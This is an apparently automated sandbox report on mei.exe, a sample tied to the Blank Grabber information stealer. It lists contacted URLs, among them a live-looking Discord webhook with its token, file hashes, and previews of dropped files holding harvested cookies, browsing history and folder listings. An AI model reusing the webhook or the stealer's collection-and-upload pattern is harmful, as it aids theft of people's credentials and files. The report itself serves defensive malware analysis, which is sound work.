                                                                                                                                  https://yahoo.com/mei.exe, 00000001.00000003.1765729830.000002E914078000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.2027450507.000002E91401A000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.1788725057.000002E914078000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.1817080943.000002E91407C000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.2025311292.000002E91407C000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.1765729830.000002E91401A000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.1819432737.000002E91401A000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000002.2033294931.000002E91401E000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.1777251401.000002E914078000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.1777251401.000002E913F70000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000002.2032511727.000002E913F70000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.2027450507.000002E91407C000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.1780553152.000002E91401A000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.1820288649.000002E913F70000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000002.2033404601.000002E91407C000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.2027822583.000002E913F70000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.2026349478.000002E913F70000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.1765729830.000002E913F70000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.2025893149.000002E91401A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                    high
                                                                                                                                    https://account.bellmedia.cmei.exe, 00000001.00000002.2037321445.000002E9155C8000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                    unknown
                                                                                                                                    http://www.iana.org/assignments/tls-parameters/tls-parameters.xml#tls-parameters-6mei.exe, 00000001.00000003.1777251401.000002E913F70000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000002.2032511727.000002E913F70000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.1820288649.000002E913F70000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.2027822583.000002E913F70000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.2026349478.000002E913F70000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.1765729830.000002E913F70000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                      high
                                                                                                                                      https://login.microsoftonline.commei.exe, 00000001.00000002.2035981021.000002E914598000.00000004.00001000.00020000.00000000.sdmp, mei.exe, 00000001.00000002.2037321445.000002E9155C0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                        high
                                                                                                                                        http://cacerts.digicert.comei.exe, 00000000.00000003.1655058953.000001FFF1DD5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                        • 0%, Virustotal, Browse
                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                        unknown
                                                                                                                                        http://crl.thawte.com/ThawteTimestampingCA.crl0mei.exe, 00000000.00000003.1656415860.000001FFF1DD5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                          high
                                                                                                                                          https://discord.com/api/webhooks/1180990550996959354/etoFF7oxewDUkUSy5k9Nl0yqXw0esYNFZVGnAZjRg16T1Hamei.exe, 00000001.00000002.2035693099.000002E914310000.00000004.00001000.00020000.00000000.sdmptrue
                                                                                                                                          • Avira URL Cloud: safe
Reputation:unknown

URL:https://html.spec.whatwg.org/multipage/
Source:mei.exe, 00000001.00000003.1765729830.000002E914078000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.1788725057.000002E914078000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.1817080943.000002E91407C000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.2025311292.000002E91407C000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.1777251401.000002E914078000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.2027450507.000002E91407C000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000002.2033404601.000002E91407C000.00000004.00000020.00020000.00000000.sdmp
Malicious:false
Reputation:high

URL:https://urllib3.readthedocs.io/en/latest/advanced-usage.html#tls-warnings
Source:mei.exe, 00000001.00000002.2035788028.000002E914410000.00000004.00001000.00020000.00000000.sdmp
Malicious:false
Reputation:high

URL:https://www.zhihu.com/
Source:mei.exe, 00000001.00000002.2035981021.000002E914598000.00000004.00001000.00020000.00000000.sdmp, mei.exe, 00000001.00000002.2035981021.000002E9145F0000.00000004.00001000.00020000.00000000.sdmp
Malicious:false
Reputation:high

URL:https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source:mei.exe, 00000001.00000003.1906554913.000002E914AD4000.00000004.00000020.00020000.00000000.sdmp
Malicious:false
Reputation:high

URL:https://contoso.com/
Source:powershell.exe, 00000038.00000002.1887513922.000001E1C1621000.00000004.00000800.00020000.00000000.sdmp
Malicious:false
Detection:
• URL Reputation: safe
Reputation:unknown

URL:https://oneget.orgX
Source:powershell.exe, 00000038.00000002.1830961000.000001E1B2A65000.00000004.00000800.00020000.00000000.sdmp
Malicious:false
Detection:
• URL Reputation: safe
Reputation:unknown

URL:http://www.iana.org/time-zones/repository/tz-link.html
Source:mei.exe, 00000001.00000003.1678406179.000002E913C8E000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.1678406179.000002E913C0A000.00000004.00000020.00020000.00000000.sdmp
Malicious:false
Reputation:high

URL:https://api.gofile.io/getServer
Source:mei.exe, 00000001.00000002.2032019714.000002E913CD0000.00000004.00001000.00020000.00000000.sdmp
Malicious:false
Reputation:high

URL:https://media.discordapp.net/attachments/1180990520542105673/1181873826842284133/Blank-user.rar?ex=
Source:mei.exe, 00000001.00000003.2025311292.000002E9140EC000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.2027051613.000002E9140F9000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000002.2034518667.000002E9140FB000.00000004.00000020.00020000.00000000.sdmp
Malicious:false
Reputation:high

URL:https://raw.githubusercontent.com/Blank-c/Blank-Grabber/main/.github/workflows/image.png
Source:mei.exe, 00000001.00000003.2025311292.000002E914078000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.2027450507.000002E914008000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000002.2031449289.000002E9139D0000.00000004.00001000.00020000.00000000.sdmp, mei.exe, 00000001.00000003.2025893149.000002E913FB7000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.2027051613.000002E9140F9000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000002.2034518667.000002E9140FB000.00000004.00000020.00020000.00000000.sdmp
Malicious:false
Detection:
• 2%, Virustotal
• Avira URL Cloud: safe
Reputation:unknown

URL:http://www.eclipse.org/0
Source:mei.exe, 00000000.00000003.1649338725.000001FFF1DE1000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1651785937.000001FFF1DE1000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1651565231.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1650835527.000001FFF1DE1000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1651177435.000001FFF1DE1000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1650171485.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1652833619.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1652354604.000001FFF1DE1000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1653171249.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1653004204.000001FFF1DE1000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1652281017.000001FFF1DE1000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1653909478.000001FFF1DE1000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1653792602.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1652913404.000001FFF1DE1000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1651679430.000001FFF1DE1000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1653909478.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1648931758.000001FFF1DE1000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1652913404.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1649250703.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1649061865.000001FFF1DE1000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1651965508.000001FFF1DE1000.00000004.00000020.00020000.00000000.sdmp
Malicious:false
Reputation:high

URL:http://nuget.org/NuGet.exe
Source:powershell.exe, 00000009.00000002.1743684934.000001BACE158000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000038.00000002.1887513922.000001E1C14DE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000038.00000002.1887513922.000001E1C1621000.00000004.00000800.00020000.00000000.sdmp
Malicious:false
Reputation:high

URL:http://www.apache.org/licenses/LICENSE-2.0
Source:powershell.exe, 00000038.00000002.1830961000.000001E1B2A65000.00000004.00000800.00020000.00000000.sdmp
Malicious:false
Reputation:high

URL:https://sectigo.com/CPS0
Source:mei.exe, 00000000.00000003.1649338725.000001FFF1DE1000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1651565231.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1650171485.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1652833619.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1653171249.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1653909478.000001FFF1DE1000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1653792602.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1652913404.000001FFF1DE1000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1653909478.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1652913404.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1649250703.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1654022915.000001FFF1DE1000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1651444604.000001FFF1DE1000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1652445454.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1651785937.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1653329931.000001FFF1DE1000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1651965508.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1651444604.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1657526057.000001FFF1DD5000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1653092654.000001FFF1DE1000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1649061865.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp
Malicious:false
Detection:
• URL Reputation: safe
Reputation:unknown

URL:https://go.mic
Source:mei.exe, 00000001.00000003.1906554913.000002E914AE2000.00000004.00000020.00020000.00000000.sdmp
Malicious:false
Detection:
• Avira URL Cloud: safe
Reputation:unknown

URL:https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source:mei.exe, 00000001.00000003.1906554913.000002E914AD4000.00000004.00000020.00020000.00000000.sdmp
Malicious:false
Reputation:high

URL:https://www.amazon.co.uk/
Source:mei.exe, 00000001.00000002.2035981021.000002E914598000.00000004.00001000.00020000.00000000.sdmp
Malicious:false
Detection:
• 0%, Virustotal
• Avira URL Cloud: safe
Reputation:unknown

URL:http://ocsp.thawte.com0
Source:mei.exe, 00000000.00000003.1656415860.000001FFF1DD5000.00000004.00000020.00020000.00000000.sdmp
Malicious:false
Detection:
• URL Reputation: safe
Reputation:unknown

URL:https://raw.githubusercontent.com/Blank-c/Blank-Grabber/main/.github/workflows/image.pngz
Source:mei.exe, 00000001.00000003.1677159074.000002E913C21000.00000004.00000020.00020000.00000000.sdmp
Malicious:false
Detection:
• 2%, Virustotal
• Avira URL Cloud: safe
Reputation:unknown

URL:https://json.org
Source:mei.exe, 00000001.00000003.1678406179.000002E913C2E000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.1679790240.000002E913B95000.00000004.00000020.00020000.00000000.sdmp
Malicious:false
Reputation:high

URL:https://www.wykop.pl/
Source:mei.exe, 00000001.00000002.2035788028.000002E914410000.00000004.00001000.00020000.00000000.sdmp
Malicious:false
Reputation:high
IP | Domain | Country | ASN | ASN Name | Malicious
208.95.112.1 | ip-api.com | United States | 53334 | TUT-ASUS | false
162.159.136.232 | discord.com | United States | 13335 | CLOUDFLARENETUS | true
Joe Sandbox version:38.0.0 Ammolite
Analysis ID:1354458
Start date and time:2023-12-06 09:23:12 +01:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 13m 2s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:default.jbs
Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:109
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode:default
Analysis stop reason:Timeout
Sample name:mei.exe
Detection:MAL
Classification:mal100.troj.adwa.spyw.expl.evad.winEXE@174/116@3/2
EGA Information:
• Successful, ratio: 60%
HCA Information:Failed
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, WmiPrvSE.exe
• Excluded IPs from analysis (whitelisted): 172.253.63.94, 172.253.63.120
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, crl.comodoca.com, gstatic.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target powershell.exe, PID 7676 because it is empty
• Execution Graph export aborted for target powershell.exe, PID 8228 because it is empty
• HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• Not all processes were analyzed; the report is missing behavior information
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size exceeded maximum capacity and may have missing disassembly code.
• Report size getting too big, too many NtAllocateVirtualMemory calls found.
• Report size getting too big, too many NtCreateFile calls found.
• Report size getting too big, too many NtEnumerateKey calls found.
• Report size getting too big, too many NtOpenFile calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Report size getting too big, too many NtQueryVolumeInformationFile calls found.
• Report size getting too big, too many NtSetInformationFile calls found.

Time | Type | Description
09:24:05 | API Interceptor | 8x Sleep call for process: WMIC.exe modified
09:24:06 | API Interceptor | 113x Sleep call for process: powershell.exe modified
Process:C:\Users\user\Desktop\mei.exe
File Type:PE32+ executable (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):8593769
Entropy (8bit):7.994244096439802
Encrypted:true
SSDEEP:196608:7x0cD9zMLjv+bhqNVoBKUh8mz4Iv9PzQ1u1D7wJM:Ki9zcL+9qz8/b4IC1uRmM
MD5:B5479BF5C97CFA81C02676BB9335AB24
SHA1:E823A36420BDECCFD8E4C6AD9D14E863263CAAC7
SHA-256:02C36B712AEAAD34359C72311C8624062EA5DFC6311A15ED2B46B403470C3BC0
SHA-512:7FD4DAC8048BB1952F479BD14E32D0CECED93A546AE1C966FEF0710CF195F45DA077E045C3B383F6C8E3151F27B7C63B1906080102640F704EFB6319B7142ACF
Malicious:true
Antivirus:
• Antivirus: Avira, Detection: 100%
• Antivirus: ReversingLabs, Detection: 35%
• Antivirus: Virustotal, Detection: 49%
Reputation:unknown
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........y~M..-M..-M..-...,E..-...,...-...,G..-X..-I..-X..,e..-X..,\..-X..,D..-...,F..-M..-..-t..,X..-t..,L..-RichM..-........................PE..d...m.ne.........."....%.....r.................@....................................>&....`.....................................................x....`..L.... ..."..!...H$...p..\...0..................................@............... ............................text...@........................... ..`.rdata...+.......,..................@..@.data...83..........................@....pdata..."... ...$..................@..@_RDATA..\....P......................@..@.rsrc...L....`......................@..@.reloc..\....p......................@..B................................................................................................................................................................................................

Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:data
Category:dropped
Size (bytes):64
                                                                                                                                                                    Entropy (8bit):0.34726597513537405
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:3:Nlll:Nll
                                                                                                                                                                    MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                                                                                                                    SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                                                                                                                    SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                                                                                                                    SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:@...e...........................................................
                                                                                                                                                                    Process:C:\Users\user\Desktop\mei.exe
                                                                                                                                                                    File Type:ASCII text, with very long lines (522), with CRLF line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):3343
                                                                                                                                                                    Entropy (8bit):5.859453163399709
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:96:jJMpoO2gFcRqFZL2L+yLstv3pPDYReynqsbCw4R2cksy:NFFRiNEUdC
                                                                                                                                                                    MD5:3A53152A5A407F6FFC00ACCAF475ACA7
                                                                                                                                                                    SHA1:535A984DD89A56CA94FC1E77D4EC8B5E5F6AD6F5
                                                                                                                                                                    SHA-256:8DF02145633200812938312EE054F6686D60CC7C11B3C17E2492AAE545907A2C
                                                                                                                                                                    SHA-512:85A269B5BDF1C8B6CBBAA79756A9BCECCF18A3EE76518D7DC77223689B9FE9D48E0C079A87AB7F3EAD8A8FD35091E2C3F6EB83E66C3F61F83F57A262273904FA
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:.google.com.TRUE./.FALSE.13356618603686193.NID.511=j8SQUTltnVU5cOAeyzqSxW-qHOakRuBHDQGLTGeceC9Z5rRzk5trMKb4CuZC_CFmc7KFwQcRJL-qGz8MvkkzMZmElvXAFWLO-TPZ9PMqBYA78ZAuaepnXIRHe-TAolVoW6Z7dQnqpgyX0m-TmS72bebAgoqZv5GkpRFUcZIw1Kk..support.microsoft.com.TRUE./.TRUE.13340887435186329..AspNetCore.AuthProvider.True..support.microsoft.com.TRUE./signin-oidc.TRUE.13340887735359381..AspNetCore.Correlation.mdRqPJxLbpyv7vX0eK9YkTR-xwcrW3VBLE4Y3HEvxuU.N..support.microsoft.com.TRUE./signin-oidc.TRUE.13340887735359334..AspNetCore.OpenIdConnect.Nonce.CfDJ8Kiuy_B5JgFMo7PeP95NLhqwcJ8koDy5pXkfoWsb5SbbU2hVCbsH2qt9GF_OVCqFkLEwhvzeADNQOF5RSmkDfh5RqfqlOkx5QWo4Lltvwb0CvwBFD8ujlm3BAglOeGca3ZatkLMUkHB6alahUr8qJ7G_3AejtooymTWCzyO89hshJeX8Gh78kohbIw0IQY4v6LZriT4P2fGeBSMjrvqODB4H_bs2nbfsSfL7aN-SiX4Yyn3iFo5fv-Rsj0cGE-FFrP1uXNT7Y1VSMOfm-L0RnS8.N..support.office.com.TRUE./.TRUE.13372509232238068.EXPID.8e067c40-5461-4aef-885f-2c92ce6a5474...microsoft.com.TRUE./.FALSE.13372422837017624.MC1.GUID=749eee6039c5489b9db3000c7ab3f
                                                                                                                                                                    Process:C:\Users\user\Desktop\mei.exe
                                                                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1941
                                                                                                                                                                    Entropy (8bit):5.070419477168993
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:48:wqMYcQpMYcHVVpbcYcHScpbcYcqjmcowmmcHVcDKJUmcHVuDKJUmc:wqMYclYcHdcYcHncYcqjmcowmmcHaDKH
                                                                                                                                                                    MD5:865C89CE71E816B7B6319F59623A1364
                                                                                                                                                                    SHA1:689E9954DA13A6445D4C31DD71CDE397A87EC3B8
                                                                                                                                                                    SHA-256:9CEC61477EB6A1A43BE5E81F018FE2B8145B1601DEED31B65FDEE337A1385856
                                                                                                                                                                    SHA-512:17C51EC2CF065E9ED7A3B8F5EC42D5B5912790456C4A22BEDFB7D93F4CC6E607AE1889E54DAEC356BF3FEB655F93C811F081361C38625F38966EA83F4533FDF4
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:==================Blank Grabber===================....URL: https://go.microsoft.com/fwlink/?LinkId=2106243..Title: Install the English Language Pack for 32-bit Office - Microsoft Support..Visits: 2....==================Blank Grabber===================....URL: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17..Title: Install the English Language Pack for 32-bit Office - Microsoft Support..Visits: 2....==================Blank Grabber===================....URL: https://support.microsoft.com/en-us/office/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17?ui=en-us&rs=en-us&ad=us..Title: Install the English Language Pack for 32-bit Office - Microsoft Support..Visits: 2....==================Blank Grabber===================....URL: https://support.microsoft.com/en-us/topic/install-the-english-language-pack-for-32-bit-office-94ba2e0b-638e-4a92-8857-2cb5ac1d8e17?ui=en-us&rs=en-us&ad=us..Title: Install the English Language Pack for 32-bit Office - Microsoft Support..Visits: 2....=========
                                                                                                                                                                    Process:C:\Users\user\Desktop\mei.exe
                                                                                                                                                                    File Type:Unicode text, UTF-8 text, with CRLF line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1527
                                                                                                                                                                    Entropy (8bit):4.957453121981548
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24:Qzk75GPHlPzWDyQ3HvoGy1tQEoyseyfnHLjbnlQyO2D4V:Mk75GPHRWt3HvoGyYEoysNHLjbA2sV
                                                                                                                                                                    MD5:78C626B53B662DD038AA1521874FF442
                                                                                                                                                                    SHA1:1C31D2E97046919E61C5BE5F75F059233AC34133
                                                                                                                                                                    SHA-256:6F33CB0C72A6D1CE2896EBE88AE145D4D6E157390FB197BC465C23F0220C69FF
                                                                                                                                                                    SHA-512:92DB682D81BB22095644718183753FA68421ACAD7C7FB9369F26069706AEA4C0654ED189303E62597EBDA6D842714784E24CDB6C5E21DABAE6DB10698F6A8351
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:Desktop... BPMLNOBVSB.jpg... DTBZGIOOSO.docx... DVWHKMNFNN.jpg... Excel.lnk... FENIVHOIKN.mp3... HTAGVDFUIE.xlsx... KATAXZVCPS.mp3... KATAXZVCPS.pdf... KZWFNRXYKI.jpg... KZWFNRXYKI.pdf... LTKMYBSEYZ.xlsx... mei.exe... NIKHQAIQAU.png... NWTVCDUMOB.pdf... NWTVCDUMOB.png... ONBQCLYSPU.pdf... UMMBDNEQBN.docx... UMMBDNEQBN.png... UOOJJOZIRH.mp3... VLZDGUKUTZ.docx... VLZDGUKUTZ.jpg... VLZDGUKUTZ.xlsx... WKXEWIOTXI.png... XZXHAVGRAG.docx... XZXHAVGRAG.xlsx... YPSIACHYXW.mp3... ..... DTBZGIOOSO... DTBZGIOOSO.docx... KATAXZVCPS.mp3... ONBQCLYSPU.pdf... UMMBDNEQBN.png... VLZDGUKUTZ.jpg... XZXHAVGRAG.xlsx... ..... DVWHKMNFNN..... HTAGVDFUIE..... JSDNGYCOWY..... NEBFQQYWPS..... NIKHQAIQAU..... QNCYCDFIJJ..... UMMBDNEQBN... BPMLNOBVSB.jpg... KZWFNRXYKI.pdf... LTKMYBS
                                                                                                                                                                    Process:C:\Users\user\Desktop\mei.exe
                                                                                                                                                                    File Type:Unicode text, UTF-8 text, with CRLF line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1497
                                                                                                                                                                    Entropy (8bit):4.946285469274244
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24:575hlUDyQ3HvoGy1tQEoyseyfnHLjbnlQyO2D4V:575hqt3HvoGyYEoysNHLjbA2sV
                                                                                                                                                                    MD5:5C58281138F39EDA87491C3E7FA838F2
                                                                                                                                                                    SHA1:9029FEDBF190FB012AEC1B0E8CC44C25F943C8CD
                                                                                                                                                                    SHA-256:294D7B644E5B0CAAB63FB94621AB0C096DDE713E6EE9C8F4BC1FBE65C627C2C3
                                                                                                                                                                    SHA-512:419912AB13189E689B9479C1761EB54E4DCD986687407899ACD9ABEA9CA6DCBC8D5F85B604ADE0CEBC6B2BA769C82BED7CEA30BFBB07DCDC31768AFDAEA9591A
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:Documents... BPMLNOBVSB.jpg... DTBZGIOOSO.docx... DVWHKMNFNN.jpg... FENIVHOIKN.mp3... HTAGVDFUIE.xlsx... KATAXZVCPS.mp3... KATAXZVCPS.pdf... KZWFNRXYKI.jpg... KZWFNRXYKI.pdf... LTKMYBSEYZ.xlsx... NIKHQAIQAU.png... NWTVCDUMOB.pdf... NWTVCDUMOB.png... ONBQCLYSPU.pdf... UMMBDNEQBN.docx... UMMBDNEQBN.png... UOOJJOZIRH.mp3... VLZDGUKUTZ.docx... VLZDGUKUTZ.jpg... VLZDGUKUTZ.xlsx... WKXEWIOTXI.png... XZXHAVGRAG.docx... XZXHAVGRAG.xlsx... YPSIACHYXW.mp3... ..... DTBZGIOOSO... DTBZGIOOSO.docx... KATAXZVCPS.mp3... ONBQCLYSPU.pdf... UMMBDNEQBN.png... VLZDGUKUTZ.jpg... XZXHAVGRAG.xlsx... ..... DVWHKMNFNN..... HTAGVDFUIE..... JSDNGYCOWY..... NEBFQQYWPS..... NIKHQAIQAU..... QNCYCDFIJJ..... UMMBDNEQBN... BPMLNOBVSB.jpg... KZWFNRXYKI.pdf... LTKMYBSEYZ.xlsx... UMMBDNEQBN
                                                                                                                                                                    Process:C:\Users\user\Desktop\mei.exe
                                                                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):527
                                                                                                                                                                    Entropy (8bit):4.954491289481831
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:12:gSbNQOboyvy/Lv42mDye/ItQ7Qs9/NHHOPG193Ufe4PQsDkalx/y:gS9jqDv4tDaQMEH2iWfDTy
                                                                                                                                                                    MD5:D3A3BB1BAC948C895BB855A698CC4D80
                                                                                                                                                                    SHA1:F6E807867DAC5A78467DCBEC570EFFAC65792125
                                                                                                                                                                    SHA-256:1147BE1624DFB4020D6896EEAC7798EEF518B902A19FA3E65651041C999471E0
                                                                                                                                                                    SHA-512:FC58361E7BD08DA1457929B5A9018B0EA0E5BB528B82FAD556544BA8F6524AD055954582C2F3E6FD49F13C5039F1BFF13CC52A62415D7055A67B7B2E2F2644B6
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:Downloads.. BPMLNOBVSB.jpg.. DTBZGIOOSO.docx.. DVWHKMNFNN.jpg.. FENIVHOIKN.mp3.. HTAGVDFUIE.xlsx.. KATAXZVCPS.mp3.. KATAXZVCPS.pdf.. KZWFNRXYKI.jpg.. KZWFNRXYKI.pdf.. LTKMYBSEYZ.xlsx.. NIKHQAIQAU.png.. NWTVCDUMOB.pdf.. NWTVCDUMOB.png.. ONBQCLYSPU.pdf.. UMMBDNEQBN.docx.. UMMBDNEQBN.png.. UOOJJOZIRH.mp3.. VLZDGUKUTZ.docx.. VLZDGUKUTZ.jpg.. VLZDGUKUTZ.xlsx.. WKXEWIOTXI.png.. XZXHAVGRAG.docx.. XZXHAVGRAG.xlsx.. YPSIACHYXW.mp3.. ..No subfolders exist ..
                                                                                                                                                                    Process:C:\Users\user\Desktop\mei.exe
